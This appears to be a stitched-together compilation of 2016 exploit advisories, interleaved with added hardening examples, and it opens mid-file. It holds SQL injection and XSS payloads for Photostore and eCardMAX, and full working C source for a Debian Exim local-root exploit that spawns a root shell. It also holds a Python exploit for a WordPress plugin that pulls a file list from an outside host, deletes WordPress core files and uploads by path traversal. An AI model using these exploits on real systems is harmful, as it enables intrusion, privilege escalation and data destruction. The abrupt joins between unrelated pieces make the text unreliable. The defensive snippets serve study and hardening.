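CPUINFO_OLD = "processor\t: 0\nflags\t\t: fpu vme de pse nx lm\n"
CPUINFO_NEW = "processor\t: 0\nflags\t\t: fpu vme de pse nx lm smep smap\n"
MODULES_IPT = ("ip_tables 28672 1 iptable_filter, Live 0x0000000000000000\n"
               "x_tables 36864 2 ip_tables,iptable_filter, Live 0x0000000000000000\n")

if __name__ == "__main__":
    for key, value in assess_host().items():
        print(f"{key:>24}: {value}")
```

Setting kernel.unprivileged_userns_clone to 0 (where the knob exists) closes the path this exploit uses even before the kernel is patched.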
            
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# Ktools Photostore <= 4.7.5 Multiple Vulnerabilities
# Bug discovered by Yakir Wizman
# Date 01/07/2016
# Affected versions prior to 4.7.5
# Vendor Homepage - http://www.ktools.net

#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
#       The author will not be responsible for any damage.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# About the Application:
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# PhotoStore is a professional photo gallery & shopping cart software which contains the following basic features, as described below:
#
# 	Sell various sizes or formats of the same photo.
# 	Sell photos, vector art, zip files and more.
# 	Sell videos PhotoStore Pro Only
# 	Sell prints, artwork, products, packages, digital collections and more.
# 	Built in shopping cart and ecommerce system to accept credit cards and/or check payments.
# 	Email notifications to both you and the customer upon purchase.
# 	Customers can instantly download after payment.
# 	Customers can instantly download their files after payment.
# 	Connects to PayPal and 2Checkout.
# 	Built in credit system to allow your customers to buy credits.
# 	Allow your members to upload and sell their photos and other media while you take a commission.
 
# The vulnerabilities described below do not require a legitimate user account to exploit.
# The Photostore application is prone to multiple vulnerabilities, such as SQL Injection and Cross Site Scripting, none of which require a legitimate user or admin privilege to exploit.
# An attacker can exploit these vulnerabilities to retrieve all the data stored in the application's database (in the case of SQL Injection) or to carry out cookie stealing / phishing attacks (in the case of Cross Site Scripting).



# SQL Injection (error based) Proof-Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# SQL Injection (Severity is Critical)
# The vulnerable parameter is “gallerySortType”, which is not sanitized; it is sent by the user to retrieve the gallery objects ordered ASC or DESC in the SQL query.
# Request Data #1 is:

POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
Cache-Control: no-cache
Referer: http://www.example.net/photostore/gallery/Objects/24/page1/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Language: en-us,en;q=0.5
Host: www.ktoolsdemos.net
Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
Accept-Encoding: gzip, deflate
Content-Length: 221
Content-Type: application/x-www-form-urlencoded

postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,[SQL_PAYLOAD]

# Inserted payload for example:
postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,(SELECT 9713 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(9713=9713,1))),0x7178717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

###
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
###
# The vulnerable parameter is “gallerySortBy”, which is not sanitized; it is sent by the user to select the column the gallery objects are ordered by in the SQL query.
# Request Data #2 is:

POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
Cache-Control: no-cache
Referer: http://server/photostore/gallery/Objects/24/page1/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Language: en-us,en;q=0.5
Host: server
Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

postGalleryForm=1&gallerySortBy=id[SQL_PAYLOAD]&gallerySortType=asc

# Inserted payload for example:
postGalleryForm=1&gallerySortBy=id AND (SELECT 7522 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7522=7522,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&gallerySortType=asc

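The block below is an added example, not Photostore's code, serving both the mgr.login.php recover_login query from the earlier Ktools advisory on this page and the gallerySortBy/gallerySortType ORDER BY parameters above: each vulnerable query pattern sits beside its hardened form. An in-memory SQLite database with constructed rows stands in for the MySQL tables, and the table prefix and sort-column allowlist are assumptions.

```python
import sqlite3

PREFIX = "ps_"                                       # stand-in for $dbinfo['pre']
SORT_COLUMNS = {"media_id", "title", "date_added"}   # assumed allowlist of sortable columns
SORT_TYPES = {"asc", "desc"}


def make_db():
    """In-memory stand-in for the Photostore tables, with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute(f"CREATE TABLE {PREFIX}admins "
               "(admin_id INTEGER, username TEXT, password TEXT, email TEXT)")
    db.executemany(f"INSERT INTO {PREFIX}admins VALUES (?, ?, ?, ?)", [
        (1, "admin", "hash-1", "admin@example.invalid"),
        (2, "editor", "hash-2", "editor@example.invalid"),
    ])
    db.execute(f"CREATE TABLE {PREFIX}media "
               "(media_id INTEGER, title TEXT, date_added TEXT)")
    db.executemany(f"INSERT INTO {PREFIX}media VALUES (?, ?, ?)", [
        (3, "c", "2016-01-03"), (1, "a", "2016-01-01"), (2, "b", "2016-01-02"),
    ])
    return db


def recover_login_vulnerable(db, email):
    """Mirrors mgr.login.php: the POSTed value is spliced into the SQL
    text, so a quote inside it changes the statement itself."""
    sql = ("SELECT username,password,email,admin_id FROM " + PREFIX +
           "admins WHERE email = '" + email + "'")
    return db.execute(sql).fetchall()


def recover_login_fixed(db, email):
    """Parameter binding: the value travels separately from the statement
    and can never alter its structure, whatever characters it contains."""
    sql = f"SELECT username,password,email,admin_id FROM {PREFIX}admins WHERE email = ?"
    return db.execute(sql, (email,)).fetchall()


def gallery_vulnerable(db, sort_by, sort_type):
    """Mirrors the gallery ORDER BY built from gallerySortBy/gallerySortType."""
    sql = f"SELECT media_id FROM {PREFIX}media ORDER BY {sort_by} {sort_type}"
    return [row[0] for row in db.execute(sql)]


def gallery_fixed(db, sort_by, sort_type):
    """Identifiers and keywords cannot be bound as parameters, so the only
    safe option is an allowlist: anything not on it is rejected outright."""
    if sort_by not in SORT_COLUMNS or sort_type.lower() not in SORT_TYPES:
        raise ValueError("rejected sort parameters")
    sql = f"SELECT media_id FROM {PREFIX}media ORDER BY {sort_by} {sort_type.upper()}"
    return [row[0] for row in db.execute(sql)]


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR '1'='1"          # constructed quote-breaking value
    print("vulnerable:", recover_login_vulnerable(db, probe))
    print("fixed:     ", recover_login_fixed(db, probe))
```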


# Cross Site Scripting Proof-Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# XSS (Severity is Medium)
# The vulnerable parameters are “mediaID” in the “workbox.php” file and “password” in the “/mgr.login.php” file, which are not sanitized and are sent by the user to the application.
#
# In Order to exploit this vulnerability, the URL should be like the following examples:
#
# http://server/photostore/workbox.php?mode=addToLightbox&mediaID=“><script>alert(/XSS/)</script>
# http://server/photostore/manager/mgr.login.php?username=demo&password='><script>alert("XSS")</script><input type='hidden


# Full path disclosure Proof-Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# FPD (Severity is low/info)
# The vulnerable parameter is “photoID” in the “productshot.php” file, which is only partially sanitized and therefore can be exploited only for full path disclosure.
#
# In order to exploit this vulnerability, the url should be like the following example:
#
# http://server/photostore/productshot.php?itemID=1&itemType=prod&photoID=%2f&size=125
            
/*
Hello List,

This is just a minor issue in Exim, no replies so far, so publication
should be OK.

Introduction:
============
Exim4 in some variants is started as root but switches to uid/gid
Debian-exim/Debian-exim. But as Exim might need to store received
messages in user mailboxes, it has to have the ability to regain
privileges. This is also true when Exim is started as "sendmail".
During internal operation, sendmail (Exim) will manipulate message
spool files in directory structures owned by user "Debian-exim"
without caring about symlink attacks. Thus execution of code as
user "Debian-exim" can be used to gain root privileges by invoking
"sendmail" as user "Debian-exim".


POC:
===
http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/EximUpgrade.c
demonstrates the issue using a ELF file being both executable
and shared library which is invoked multiple times by different
processes.


Results, Discussion:
===================
As the Exim4 process itself is already quite privileged - it has to
access the user mailboxes with different UIDs anyway - having
such problems is to be expected and explainable. A change in documentation
might make sense, to indicate that the special user "Debian-exim"
is only intended to mark files being used by the daemon, but not
to provide root/daemon user privilege separation.

Even without this vulnerability, a "Debian-exim" process could
use http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
to escalate to "adm" group, which again makes it very likely to
use "syslog", "apache" or other components to escalate to root
via "/var/log". This is annoying, perhaps this should get a CVE
to make daemon-to-root escalations harder in general.
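The pattern that prevents the symlink swap described above, as an added example in Python rather than Exim's own C: a privileged process opening a file in a directory writable by a less privileged account must refuse to follow a symlink and must verify the object it actually opened via fstat, not the path. The spool layout and file names are constructed in a temporary directory.

```python
import errno
import os
import stat
import tempfile


def open_spool_file(path, expected_uid, flags=os.O_RDWR):
    """Open a spool file without following a final-component symlink, then
    verify the object actually opened (fstat, never lstat on the path, so
    there is no window between check and use)."""
    try:
        fd = os.open(path, flags | os.O_NOFOLLOW | os.O_NOCTTY)
    except OSError as exc:
        if exc.errno == errno.ELOOP:
            raise PermissionError(f"{path}: symlink, refusing to follow") from None
        raise
    st = os.fstat(fd)
    if not stat.S_ISREG(st.st_mode):
        os.close(fd)
        raise PermissionError(f"{path}: not a regular file")
    if st.st_uid != expected_uid:
        os.close(fd)
        raise PermissionError(f"{path}: owned by uid {st.st_uid}, expected {expected_uid}")
    if st.st_nlink != 1:
        # A hard link planted by the spool owner would alias a file elsewhere.
        os.close(fd)
        raise PermissionError(f"{path}: extra hard links present")
    return fd


def classify(path, expected_uid):
    """'ok' when the file is safe to write, otherwise the refusal reason."""
    try:
        fd = open_spool_file(path, expected_uid)
    except PermissionError as exc:
        return "refused: " + str(exc).split(": ", 1)[1]
    os.close(fd)
    return "ok"


def demo():
    """Constructed spool: a genuine message file and a symlink planted in the
    spool that points at a file outside it, as in the advisory."""
    root = tempfile.mkdtemp(prefix="spool-demo-")
    spool = os.path.join(root, "input")
    os.mkdir(spool)
    outside = os.path.join(root, "target-stand-in")   # plays the overwritten library
    with open(outside, "w") as fh:
        fh.write("original contents\n")
    real = os.path.join(spool, "xxxxxx-xxxxxx-xx-J")
    with open(real, "w") as fh:
        fh.write("message\n")
    link = os.path.join(spool, "yyyyyy-yyyyyy-yy-J")
    os.symlink(outside, link)
    me = os.getuid()
    return {
        "regular": classify(real, me),
        "symlink": classify(link, me),
        "wrong_owner": classify(real, me + 1),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:>12}: {verdict}")
```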


Timeline:
========
20160605: Discovery, report Debian security
20160607: Writeup
20160611: Also verified in Ubuntu, https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/
20160630: Publication


References:
==========
* http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/
* http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
* https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/

 * This software is provided by the copyright owner "as is" and any
 *  expressed or implied warranties, including, but not limited to,
 *  the implied warranties of merchantability and fitness for a particular
 *  purpose are disclaimed. In no event shall the copyright owner be
 *  liable for any direct, indirect, incidential, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
 *
 *  Copyright (c) 2016 halfdog <me (%) halfdog.net>
 *  See http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/
 *  for more information.
 *
 *  Compile: gcc -fPIC -shared -Xlinker -init=_libInit -Xlinker '--soname=LIBPAM_1.0' -Xlinker --default-symver -o EximUpgrade EximUpgrade.c -Wl,-e_entry
 *  Use: Run as "Debian-exim": ./EximUpgrade --Upgrade
 */

#define _GNU_SOURCE
#include <assert.h>
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

#define UPGRADE_FILE_NAME	"/var/spool/exim4/EximUpgrade"
#define UPGRADE_LIB_DIR		"/var/spool/exim4"

#define TARGET_PATH		"/lib/x86_64-linux-gnu/libpam.so.0.83.1"

extern char **environ;

#if defined(__x86_64__)
const char lib_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2";
#define init_args(argc, argv) __asm__ volatile ( \
    "mov 0x8(%%rbp), %%edx \n\tmov %%edx, %0 \n\tlea 0x10(%%rbp), %1 \n\t" \
    :"=m"(argc), "=r"(argv)::"memory")
#endif /* __x86_64__ */


/** Library initialization function, called by the linker. If not
 *  named _init, parameter has to be set during linking using -init=name
 */
extern void _libInit() {
  if(geteuid()!=0) return;
  int result=chown(UPGRADE_FILE_NAME, 0, 0);
  assert(!result);
  result=chmod(UPGRADE_FILE_NAME, 04755);
  assert(!result);
  exit(0);
}

int main(int argc, char **argv);   /* defined below; declared here for _entry */

extern void _entry (void) {
  int	argc=0;
  char	**argv = NULL;
  init_args(argc, argv);
  int result=main(argc, argv);
  exit(result);
}

extern void pam_start() {}
extern void pam_set_item() {}
extern void pam_chauthtok() {}
extern void pam_end() {}
extern void pam_strerror() {}
extern void pam_getenvlist() {}
extern void pam_open_session() {}
extern void pam_close_session() {}
extern void pam_get_item() {}
extern void pam_acct_mgmt() {}
extern void pam_setcred() {}
extern void pam_authenticate() {}


int main(int argc, char **argv) {
  DIR	*dirStruct;
  struct dirent	*dirEnt;
  char	linkPath[1024];
  int	result;

  assert(argc>1);
  if(!strcmp(argv[1], "--Exec")) {
    setresgid(0, 0, 0);
    setresuid(0, 0, 0);
    execve(argv[2], argv+2, environ);
    fprintf(stderr, "Exec failed\n");
    return(1);
  }

  if(!strcmp(argv[1], "--Repair")) {
    int targetFd=open(TARGET_PATH, O_RDWR);
    assert(targetFd>=0);
    result=chown(TARGET_PATH, atoi(argv[2]), atoi(argv[3]));
    assert(!result);
    chmod(TARGET_PATH, atoi(argv[4]));
    return(0);
  }

  if(!strcmp(argv[1], "--Upgrade")) {
    struct stat origStatData;
    stat(TARGET_PATH, &origStatData);

    char *execArgs[6];
    int childPid=fork();
    if(!childPid) {
      int inputFd=open("/dev/null", O_RDONLY);
      dup2(inputFd, 0);
      execArgs[0]="/usr/sbin/sendmail";
      execArgs[1]="root@localhost";
      execArgs[2]=NULL;
      result=execve(execArgs[0], execArgs, environ);
      assert(!result);
      return(0);
    }

    strcpy(linkPath, "/var/spool/exim4/input/xxxxxx-xxxxxx-xx-J");
    dirStruct=opendir("/var/spool/exim4/msglog");
    assert(dirStruct);
    result=1;
    while(result) {
      while((dirEnt=readdir(dirStruct))) {
        if(*dirEnt->d_name=='.') continue;
// Be fast, perhaps aligned word copy needed. Pray to 23 in demo.
        strncpy(linkPath+23, dirEnt->d_name, 16);
        result=symlink(TARGET_PATH, linkPath);
        assert(!result);
        fprintf(stderr, "Relinked %s\n", linkPath);
        break;
      }
      rewinddir(dirStruct);
    }
    closedir(dirStruct);
    while(1) {
      struct stat currentStatData;
      stat(TARGET_PATH, &currentStatData);
      if(currentStatData.st_uid!=origStatData.st_uid) break;
      sleep(1);
    }
    waitpid(childPid, NULL, 0);

    fprintf(stderr, "Target ready for writing\n");
    int targetFd=open(TARGET_PATH, O_RDWR);
    assert(targetFd>=0);
    char *origData=(char*)malloc(origStatData.st_size);
    result=read(targetFd, origData, origStatData.st_size);
    assert(result==origStatData.st_size);

    struct stat newStatData;
    stat(UPGRADE_FILE_NAME, &newStatData);
    char *newData=(char*)malloc(newStatData.st_size);
    int selfFd=open(UPGRADE_FILE_NAME, O_RDONLY);
    result=read(selfFd, newData, newStatData.st_size);
    assert(result==newStatData.st_size);
    close(selfFd);

    ftruncate(targetFd, 0);
    lseek(targetFd, 0, SEEK_SET);
    result=write(targetFd, newData, newStatData.st_size);
    assert(result==newStatData.st_size);
    fsync(targetFd);

    childPid=fork();
    if(!childPid) {
      execArgs[0]="/bin/su";
      execArgs[1]=NULL;
      result=execve(execArgs[0], execArgs, environ);
      assert(!result);
      return(0);
    }
    waitpid(childPid, NULL, 0);

    ftruncate(targetFd, 0);
    lseek(targetFd, 0, SEEK_SET);
    result=write(targetFd, origData, origStatData.st_size);
    close(targetFd);

    childPid=fork();
    if(!childPid) {
      char numbers[128];
      char *ptr=numbers;
      execArgs[0]=UPGRADE_FILE_NAME;
      execArgs[1]="--Repair";
      result=sprintf(ptr, "%d", origStatData.st_uid);
      execArgs[2]=ptr; ptr+=result+1;
      result=sprintf(ptr, "%d", origStatData.st_gid);
      execArgs[3]=ptr; ptr+=result+1;
      result=sprintf(ptr, "%d", origStatData.st_mode);
      execArgs[4]=ptr;
      execArgs[5]=NULL;
      result=execve(execArgs[0], execArgs, environ);
      assert(!result);
      return(0);
    }
    waitpid(childPid, NULL, 0);

    execArgs[0]=UPGRADE_FILE_NAME;
    execArgs[1]="--Exec";
    execArgs[2]="/bin/bash";
    execArgs[3]="-c";
    execArgs[4]="id; exec $0";
    execArgs[5]=NULL;
    execve(execArgs[0], execArgs, environ);
    return(1);
  }
  fprintf(stderr, "Usage: %s --Upgrade or --Exec [args]\n", argv[0]);
  return(1);
}
            
Advisory ID: ZSL-2016-5336
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5336.php

eCardMAX 10.5 SQL Injection and XSS Vulnerabilities


[Software]

- eCardMAX 10.5


[Vendor]

- eCardMAX.COM - http://www.ecardmax.com/


[Vendor Product Description]

- eCardMax is the most trusted, powerful and dynamic online ecard software solution. It enables you to create your 
own ecard website with many of the advanced features found on other major sites. Starting your own ecard website 
with eCardMax is fast and easy.


[Advisory Timeline]

- 13/06/2016 -> Vulnerability discovered;
- 13/06/2016 -> First contact with vendor;
- 13/06/2016 -> Vendor responds asking for details;
- 14/06/2016 -> Vulnerability details sent to the vendor;
- 17/06/2016 -> Vendor working on a patch;
- 28/06/2016 -> Vendor releases patch;
- 01/07/2016 -> Public security advisory published.


[Bug Summary]

- SQL Injection

- Cross Site Scripting (Reflected)


[Impact]

- High


[Affected Version]

- v10.5


[Tested on]

- Apache/2.2.26
- PHP/5.3.28
- MySQL/5.5.49-cll


[Bug Description and Proof of Concept]

- eCardMAX suffers from a SQL Injection vulnerability. Input passed via the 'row_number' GET parameter is not properly 
sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting 
arbitrary SQL code.

- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via multiple parameters 
is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's 
browser session in context of an affected site.


[Proof-of-Concept]

1. SQL Injection:

Parameter: row_number (GET)
POC URL:
http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%20order%20by%201--&search_year=2016&page=2

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

2. Cross Site Scripting (Reflected):

http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=all&keyword=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cmd_button=Search+User
Parameter(s): keyword (GET)

http://localhost/ecardmaxdemo/admin/index.php?step=admin_cellphone_carrier&row_number=15&page=14%22%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
Parameter(s): page (GET)

http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search_year=2016&page=2
Parameter(s): row_number (GET)

http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display_inactive_account&what=&row_number=15&what2=&cmd_button=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&list_item=%3C/script%3E%3Cscript%3Ealert(2)%3C/script%3E&search_field=%3C/script%3E%3Cscript%3Ealert(3)%3C/script%3E&keyword=&num_day=%3C/script%3E%3Cscript%3Ealert(4)%3C/script%3E&num_what=%3C/script%3E%3Cscript%3Ealert(5)%3C/script%3E&from_month=%3C/script%3E%3Cscript%3Ealert(6)%3C/script%3E&from_day=%3C/script%3E%3Cscript%3Ealert(7)%3C/script%3E&from_year=%3C/script%3E%3Cscript%3Ealert(8)%3C/script%3E&to_day=%3C/script%3E%3Cscript%3Ealert(9)%3C/script%3E&to_month=%3C/script%3E%3Cscript%3Ealert(10)%3C/script%3E&to_year=%3C/script%3E%3Cscript%3Ealert(11)%3C/script%3E&page=2%3C/script%3E%3Cscript%3Ealert(12)%3C/script%3E
Parameter(s): cmd_button, list_item, search_field, num_day, num_what, from_month, from_day, from_year, to_day, to_month, to_year, page  (GET)

http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=user_name_id&cmd_button=Search+User&keyword=833981213299707%22%3E%3Cscript%3Ealert(1)%3C/script%3E
Parameter(s): keyword (GET)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

All flaws described here were discovered and researched by:

Bikramaditya Guha aka "PhoenixX"
            
#########################################################################
# [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin
# [+] http://codecanyon.net/item/real3d-flipbook-wordpress-plugin/6942587
# [+] Multiple Vulnerabilities Found by: Mukarram Khalid
# [+] https://mukarramkhalid.com/wordpress-real-3d-flipbook-plugin-exploit/
# [+] Requirements : Python 3.4.x or higher, Requests Module
# [+] Timeline: Vuln Found : 01-07-2016, Reported to Vendor: 03-07-2016
########################################################################

import os, json, base64
try:
    import requests
except:
    exit('[-] Importing Requests module failed')

class wpFlipbook:
    ''' Wordpress 3d flipbook plugin exploit '''

    headers  = {'User-agent' : 'Mozilla/11.0'}
    payload1 = {'deleteBook' : ''}
    payload2 = {'imgbase' : '', 'bookName' : '../../../', 'pageName' : 'makman'}
    payload3 = {'action' : 'delete', 'bookId' : '<script>alert(/makman/)</script>'}
    imageUrl = 'http://makman.tk/makman.jpg'
    wpFilesUrl = 'http://makman.tk/wpFiles.json'

    def __init__(self, url):
        url = url.rstrip('/')
        if 'http://' in url or 'https://' in url:
            self.url = url
        else:
            self.url = 'http://' + url

    def http(self, url, data = {}, post = False):
        try:
            if post:
                r = requests.post(url, data = data, headers = self.headers, timeout = 20)
            else:
                r = requests.get(url, params = data, headers = self.headers, timeout = 20)
        except:
            exit('[-] Something went wrong. Please check your internet connection')
        return r

    def deleteFiles(self):
        print('[+] Loading Wordpress file structure')
        r = self.http(self.wpFilesUrl)
        wpFiles = json.loads(r.text)
        print('[+] Wordpress File structure loaded successfully')
        print('[+] Creating directory real3dflipbook')
        r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', {'imgbase' : 'makman'}, True)
        print('[+] Deleting Files from wp-includes/ & wp-admin/')
        for wpFile in wpFiles['wpFiles']:
            print('    [+] Deleting File ' + wpFile)
            self.payload1['deleteBook'] = wpFile
            r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload1, True)
        print('[+] Files have been deleted successfully')

    def uploadImage(self):
        print('[+] Loading image file')
        r = self.http('http://makman.tk/makman.jpg')
        encodedImage = base64.b64encode(r.content)
        self.payload2['imgbase'] = ';,' + encodedImage.decode('utf-8')
        print('[+] Uploading image file in target root directory')
        r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload2, True)
        print('[+] Image has been uploaded here ' + self.url + '/' + self.payload2['pageName'] + '.jpg')

    def xss(self):
        print('[+] Checking XSS payload')
        r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php', self.payload3)
        if self.payload3['bookId'] in r.text:
            print('[+] Found XSS here :')
            print('    [+] ' + self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php?action=' + self.payload3['action'] + '&bookId=' + self.payload3['bookId'])

#########################################################################################################

def banner():
    os.system('cls' if os.name == 'nt' else 'clear')
    tabs = '    '
    print(tabs + '*******************************************************************')
    print(tabs + '* [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin  *')
    print(tabs + '* [+] Multiple Vulnerabilities Found by:                          *')
    print(tabs + '* [+] https://mukarramkhalid.com                                  *')
    print(tabs + '*******************************************************************\n\n')

def main():
    banner()
    url = input('[+] Enter Url\n[+] E.g. http://server or http://server/wordpress\n[+] ')
    exploit = wpFlipbook(url)
    exploit.deleteFiles()
    exploit.uploadImage()
    exploit.xss()
    print('[+] Done')

if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        exit('\n[-] CTRL-C detected.\n')
# End
            
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt

[+] ISR: ApparitionSec



Vendor:
==========================
www.k5n.us/webcalendar.php



Product:
==================
WebCalendar v1.2.7

WebCalendar is a PHP-based calendar application that can be configured as a
single-user calendar, a multi-user calendar for groups of users, or as an
event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2,
Interbase, MS SQL Server, or ODBC is required.

WebCalendar can be setup in a variety of ways, such as...

A schedule management system for a single person
A schedule management system for a group of people, allowing one or more
assistants to manage the calendar of another user
An events schedule that anyone can view, allowing visitors to submit new
events
A calendar server that can be viewed with iCalendar-compliant calendar
applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or
RSS-enabled
applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.




Vulnerability Type:
======================
CSRF PROTECTION BYPASS



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

WebCalendar attempts to use the HTTP Referer header to check that requests
originate from the same server, as shown below.

From WebCalendar "include/functions.php" file on line 6117:

////////////////////////////////////////////////////////////

function require_valide_referring_url ()
{
  global $SERVER_URL;

  if ( empty( $_SERVER['HTTP_REFERER'] ) ) {
    // Missing the REFERER value
    //die_miserable_death ( translate ( 'Invalid referring URL' ) );
    // Unfortunately, some version of MSIE do not send this info.
    return true;
  }

  if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {
    // Gotcha.  URL of referring page is not the same as our server.
    // This can be an instance of XSRF.
    // (This may also happen when more than address is used for your server.
    // However, you're not supposed to do that with this version of
    // WebCalendar anyhow...)
    die_miserable_death ( translate ( 'Invalid referring URL' ) );
  }
}

/////////////////////////////////////////////////////////////////////////////////////////

However, this can be easily defeated by simply not sending a Referer. HTML5
includes a handy tag, <meta name="referrer" content="none">, which omits the
Referer when making an HTTP request; it is currently supported in Chrome,
Safari, MobileSafari and other WebKit-based browsers. Using this meta tag we
send no referrer, and the vulnerable application will then happily process our
CSRF requests.
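The referer check above and a fail-closed alternative side by side, as an added example in Python (not WebCalendar code): the as-shipped mirror accepts the referer-less request that the meta tag produces, while the replacement requires a same-origin Origin/Referer header plus a per-session synchronizer token. SERVER_URL and the sample requests are constructed for the example.

```python
import hmac
import re
import secrets
from urllib.parse import urlsplit

# Assumed deployment URL; WebCalendar reads the real one from $SERVER_URL.
SERVER_URL = "http://localhost/WebCalendar-1.2.7/"


def referer_check_as_shipped(headers, server_url=SERVER_URL):
    """Python mirror of require_valide_referring_url() above.

    Two weaknesses are visible: a missing Referer is accepted outright (the
    bypass the advisory uses), and a present Referer only has to *contain*
    server_url somewhere, because the preg_match() is unanchored and unescaped.
    """
    referer = headers.get("Referer", "")
    if not referer:
        return True                                   # fails open
    return re.search(server_url, referer, re.IGNORECASE) is not None


def issue_csrf_token(session):
    """Store a fresh per-session synchronizer token and return it; the
    application embeds it as a hidden field in every state-changing form."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def request_is_trusted(headers, session, form, server_url=SERVER_URL):
    """Fail-closed replacement: the request must carry an Origin or Referer
    whose scheme and host equal ours, AND the form must carry the session's
    synchronizer token. A browser-suppressed Referer no longer helps."""
    expected = urlsplit(server_url)
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    src = urlsplit(source)
    if (src.scheme.lower(), src.netloc.lower()) != (expected.scheme, expected.netloc.lower()):
        return False
    token = form.get("csrf_token", "")
    stored = session.get("csrf_token", "")
    return bool(stored) and hmac.compare_digest(token, stored)


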